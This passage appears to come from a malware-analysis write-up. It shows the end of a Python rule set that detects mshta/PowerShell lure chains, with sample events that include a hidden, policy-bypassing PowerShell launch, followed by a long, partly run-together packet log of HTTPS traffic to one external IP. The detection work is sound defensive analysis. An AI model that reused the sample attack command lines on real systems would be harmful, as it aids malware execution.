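     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -w hidden -ep bypass -c "..."'},   # assumed
    {"pid": 7872, "ppid": 7752,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -c "..."'},                       # assumed
    {"pid": 7900, "ppid": 4242, "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe C:\Program Files\Vendor\setup.hta"},  # benign local HTA
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_chains(events):
    """Return (rule, pid) alerts from process-creation events.

    Rules: mshta given a remote URL with a non-HTA extension; that mshta's parent
    is a powershell.exe that lowered the execution policy; powershell.exe spawned
    by mshta.exe. A local .hta launched from an ordinary parent raises nothing.
    """
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        if name == "mshta.exe":
            if any(url_extension(u) not in LEGIT_MSHTA_EXT
                   for u in URL_RE.findall(e["command_line"])):
                alerts.append(("mshta_remote_decoy_extension", e["pid"]))
            if pname == "powershell.exe" and EP_RE.search(parent["command_line"]):
                alerts.append(("mshta_from_policy_bypassed_powershell", e["pid"]))
        elif name == "powershell.exe" and pname == "mshta.exe":
            alerts.append(("powershell_child_of_mshta", e["pid"]))
    return alerts


if __name__ == "__main__":
    for finding in analyze_script(SAMPLE_PS1):
        print("script:", *finding)
    for alert in suspicious_chains(EVENTS):
        print("chain: ", *alert)
```

The extension check is the part worth keeping in a real rule: a URL handed to mshta that does not end in .hta or .htm/.html is the cheapest discriminator for this family of lures, because the fake media or image name is chosen to survive a glance at the command line and a URL-category filter, and mshta itself never looks at it.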
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 15:30:59.244585037 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:30:59.244643927 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:30:59.244719028 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:30:59.256724119 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:30:59.256740093 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:00.477869034 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:00.477962971 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:00.552639008 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:00.552664042 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:00.552932024 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:00.552985907 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:00.554954052 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:00.599334955 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:01.081480980 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:01.081532001 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:01.081562042 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:01.081589937 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:01.081624985 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:01.081655025 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:01.081693888 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:01.081739902 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:01.081758976 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:01.081808090 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:01.089890957 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:01.089952946 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:01.090066910 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
                                              Dec 24, 2024 15:31:01.090110064 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.099493027 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.099550962 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.106956005 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.107032061 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.201993942 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.202152014 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.202276945 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.202323914 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.272874117 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.272945881 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.276772022 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.276829958 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.278354883 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.278398037 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.286448002 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.286511898 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.286879063 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.286935091 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.294604063 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.294662952 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.294687986 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.294728041 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.302881002 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.302937984 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.303050041 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.303092003 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.310739040 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.310935974 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.310949087 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.310993910 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.320396900 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.320445061 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.320533991 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.320574045 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.326773882 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.326817036 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.327337980 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.327377081 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.334902048 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.334969997 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.335151911 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.335196018 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.343400002 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.343456984 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.349517107 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.349570036 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.349579096 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.349621058 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.355972052 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.356024027 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.356570005 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.356616974 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.465229034 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.465274096 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.465286016 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.465325117 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.468322039 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.468374968 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.468693018 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.468734980 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.475054026 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.475116014 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.477752924 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.477801085 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.483645916 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.483696938 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.491069078 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.491122007 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.503173113 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.503232956 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.509572029 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.509651899 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.516130924 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.516321898 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.529064894 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.529165030 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.539375067 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.539453030 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.545104027 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.545178890 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.555775881 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.555830002 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.565411091 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.565464973 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.575534105 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.575587034 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.581437111 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.581485987 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.657102108 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.657159090 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.664700031 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.664752960 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.671025991 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.671087980 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.679296017 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.679347038 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.688191891 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.688242912 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.693607092 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.693660021 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.699824095 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.699877024 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.703298092 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.703351974 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.710434914 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.710489035 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.717370033 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.717427015 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.724436998 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.724489927 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.729052067 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.729103088 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.735059977 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.735109091 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.741677999 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.741739988 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.748681068 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.748737097 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.750823975 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.750874043 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.757405043 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.757456064 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.764285088 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.764333963 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.771188021 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.771262884 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.776099920 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.776156902 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.781599045 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.781652927 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.788634062 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.788680077 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.792722940 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.792779922 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.798959017 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.799010992 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.805622101 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.805669069 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.849169016 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.849220991 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.854618073 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.854675055 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.857217073 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.857270956 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.863507986 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.863605022 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.873800993 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.873842955 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.873874903 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.873887062 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.873898029 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.873922110 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.890249014 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.890265942 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.890348911 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.890358925 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.890402079 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.903907061 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.903923035 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.903976917 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.903983116 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.904023886 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.914505959 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.914525986 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.914566040 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.914572001 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.914597034 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.914614916 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.923495054 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.923507929 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.923567057 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.923572063 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.923610926 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.931493998 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.931507111 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.931552887 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.931557894 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.931592941 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.940197945 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.940212965 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.940262079 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.940268993 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.940285921 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.940294981 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.040873051 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.040926933 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.048150063 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.048165083 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.048217058 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.048224926 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.048254013 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.048279047 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.054277897 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.054299116 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.054331064 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.054337025 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.054364920 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.054383039 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.060602903 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.060623884 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.060658932 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.060663939 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.060687065 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.060704947 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.065135956 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.065176964 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.065193892 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.065200090 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.065220118 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.065227985 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.067079067 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.067130089 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.072865009 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.072876930 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.072923899 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.072930098 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.072961092 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.072973013 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.074817896 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.074868917 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.080945969 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.080959082 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.081024885 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.081032038 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.081068993 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.081901073 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.081957102 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.088259935 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.088274956 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.088321924 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.088329077 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.088367939 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.089267015 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.089309931 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.235141993 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.235183954 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.235219955 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.235258102 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.235272884 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.235301971 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.241333008 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.241348982 CET44349730172.67.201.143192.168.2.4
Dec 24, 2024 15:31:02.241410017 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.241425991 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:02.241462946 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.243989944 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:02.244039059 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.244046926 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:02.244093895 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.251077890 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:02.251096010 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:02.251135111 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.251140118 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:02.251167059 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.251188040 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.256562948 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:02.256578922 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:02.256628036 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.256634951 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:02.256671906 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.261434078 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:02.261470079 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:02.261487961 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.261495113 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:02.261507988 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:02.261519909 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.261537075 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.261559963 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.261698008 CET | 49730 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:02.261713028 CET | 443 | 49730 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:05.415133953 CET | 49734 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:05.415179968 CET | 443 | 49734 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:05.415263891 CET | 49734 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:05.423818111 CET | 49734 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:05.423840046 CET | 443 | 49734 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:06.638498068 CET | 443 | 49734 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:06.638587952 CET | 49734 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:06.641098022 CET | 49734 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:06.641108036 CET | 443 | 49734 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:06.641318083 CET | 443 | 49734 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:06.653100967 CET | 49734 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:06.695337057 CET | 443 | 49734 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:07.196409941 CET | 443 | 49734 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:07.196468115 CET | 443 | 49734 | 172.67.201.143 | 192.168.2.4
Dec 24, 2024 15:31:07.196516991 CET | 49734 | 443 | 192.168.2.4 | 172.67.201.143
Dec 24, 2024 15:31:07.203849077 CET | 49734 | 443 | 192.168.2.4 | 172.67.201.143
Timestamp | Source Port | Dest Port | Source IP | Dest IP
